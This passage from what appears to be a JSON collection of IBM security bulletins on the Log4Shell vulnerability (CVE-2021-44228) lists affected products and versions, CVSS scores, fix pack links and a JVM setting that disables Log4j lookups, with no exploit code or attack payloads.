seamlessly upgrade to 21.0.2 to apply the patch. \nIf you are on a version of Process Server that uses ElasticSearch 6, you can seamlessly upgrade to Process Federation Server V20.0.0.1 and apply the patch.\n\nAnother vulnerable copy of the Log4j library was shipped with offline documentation. If you have not already done so, remove offline documentation as advised in [Security Bulletin: Multiple vulnerabilities may affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) offline documentation](<https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-may-affect-ibm-business-automation-workflow-and-ibm-business-process-manager-bpm-offline-documentation/> \"Security Bulletin: Multiple vulnerabilities may affect IBM Business Automation Workflow and IBM Business Process Manager \\(BPM\\) offline documentation\" ).\n\nAs an additional protection, we recommend setting a Java system property for your Process Federation Server (or User Management Server) in jvm.options:\n\nAdd -Dlog4j2.formatMsgNoLookups=true to jvm.options as described in <https://www.ibm.com/docs/en/was-liberty/core?topic=manually-customizing-liberty-environment>. Alternatively, you can set an environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. This setting can help mitigate risks in code (including custom code like a TAI) using a version of log4j >=2.10.\n\nIBM Business Automation Workflow builds on top of IBM WebSphere Application Server 8.5.5. You must ensure to follow [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) to patch the underlying application server platform.\n\nIBM Business Automation Workflow allows customers to build apps on top of the platform. These apps may bring their own (vulnerable) copy of log4j-core-2.x and may use it from custom Java code. It is important to review and fix all vulnerable use of log4j-core-2.x in your custom apps.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSFTBX\",\"label\":\"IBM Business Process Manager Express\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"8.6, 8.5.7.CF201706, 8.5.7.CF201703, 8.5.7.CF201612, 8.5.7.CF201609, 8.5.7.CF201606, 8.5.7, 8.5.6.2, 8.5.6.1, 8.5.6, 8.5.5, 8.5.0.2, 8.5.0.1, 8.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS8JB4\",\"label\":\"IBM Business Automation Workflow\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"18.0.0.0, 18.0.0.1, 18.0.0.2, 19.0.0.1, 19.0.0.2, 19.0.0.3,20.0.0.1, 20.0.0.2,21.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSFTN5\",\"label\":\"IBM Business Process Manager Advanced\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"8.6, 8.5.7.CF201706, 8.5.7.CF201703, 8.5.7.CF201612, 8.5.7.CF201609, 8.5.7.CF201606, 8.5.7, 8.5.6.2, 8.5.6.1, 8.5.6, 8.5.5, 8.5.0.2, 8.5.0.1, 8.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSFTDH\",\"label\":\"IBM Business Process Manager Standard\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"8.6, 8.5.7.CF201706, 8.5.7.CF201703, 8.5.7.CF201612, 8.5.7.CF201609, 8.5.7.CF201606, 8.5.7, 8.5.6.2, 8.5.6.1, 8.5.6, 8.5.5, 8.5.0.2, 8.5.0.1, 8.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T15:43:05", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Business Automation Workflow (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T15:43:05", "id": "5C1515C744F7537118B0717D85B52611810BBDF6206930989FA3E05682B9BEC8", "href": "https://www.ibm.com/support/pages/node/6527768", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:47:01", "description": "## Summary\n\nIBM Data Risk Manager (IDRM) 2.0.6.9 and earlier is impacted by Log4Shell (CVE-2021-44228), through the use of Apache Log4j's JNDI logging feature. This vulnerability has been addressed in the updated version of IDRM 2.0.6.10. Please see remediation steps below to apply fix. All customers encouraged to act quickly to update their systems.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM DRM| 2.0.6 \n \n\n\n## Remediation/Fixes\n\nTo obtain fixes for all reported issues, customers are advised first to upgrade to v2.0.6.9, and then apply the latest FixPack 2.0.6.10. \n\n**NOTE:** The FixPack is not cumulative. So it must be applied on top of 2.0.6.9 in sequence.\n\n_Product_| _VRMF_| _APAR \n_| _Remediation / First Fix_ \n---|---|---|--- \nIBM Data Risk Manager| 2.0.6| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.1_Fixpack ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.4.1&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.2_Fixpack ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.1&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.3_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.2&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n5) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n9) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n10) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.1| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.2_Fixpack ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.1&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.3_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.2&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n4) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n9) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.2| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.3_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.2&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n3) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.3| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n2) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.4| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.5| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.6| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.7| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.8| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.9| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSJQ6V\",\"label\":\"IBM Data Risk Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF004\",\"label\":\"Appliance\"}],\"Version\":\"2.0.6\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T04:28:35", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Data Risk Manager (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T04:28:35", "id": "5CCDFC397B134AA5DCE5EBE10022C85B3EE99DAF9D679B25DCCA69CA3D851EBF", "href": "https://www.ibm.com/support/pages/node/6527094", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:19", "description": "## Summary\n\nLog4j is used by IBM Spectrum Conductor for generating logs in some of its components. This bulletin provides patches for the Log4Shell vulnaribility (CVE-2021-44228) to IBM Spectrum Conductor.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Conductor| 2.4.1 \nIBM Spectrum Conductor| 2.5.0 \nIBM Spectrum Conductor| 2.5.1 \n \n## Remediation/Fixes\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/First Fix**_ \n---|---|---|--- \nIBM Spectrum Conductor| 2.4.1| P104516| \n\n[sc-2.4.1-build600955](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.4.1-build600955&includeSupersedes=0> \"sc-2.4.1-build600955\" ) \n \nIBM Spectrum Conductor| 2.5.0| P104513| \n\n[sc-2.5-build600954](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5-build600954&includeSupersedes=0> \"sc-2.5-build600954\" ) \n \nIBM Spectrum Conductor| 2.5.1| P104512| \n\n[sc-2.5.1-build600953](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5.1-build600953&includeSupersedes=0> \"sc-2.5.1-build600953\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS4H63\",\"label\":\"IBM Spectrum Conductor\"},\"Component\":\"ASCD\\/PMC\\/Explorer\\/conductorspark\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.5.1;2.5.0;2.4.1\",\"Edition\":\"2.5.1;2.5.0;2.4.1\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T16:23:40", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j addressed in IBM Spectrum Conductor", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-07T16:23:40", "id": "2709A19D29B9047D230E570EBF5F26A53D322D557D88CBCFB480F1AFEEF6797C", "href": 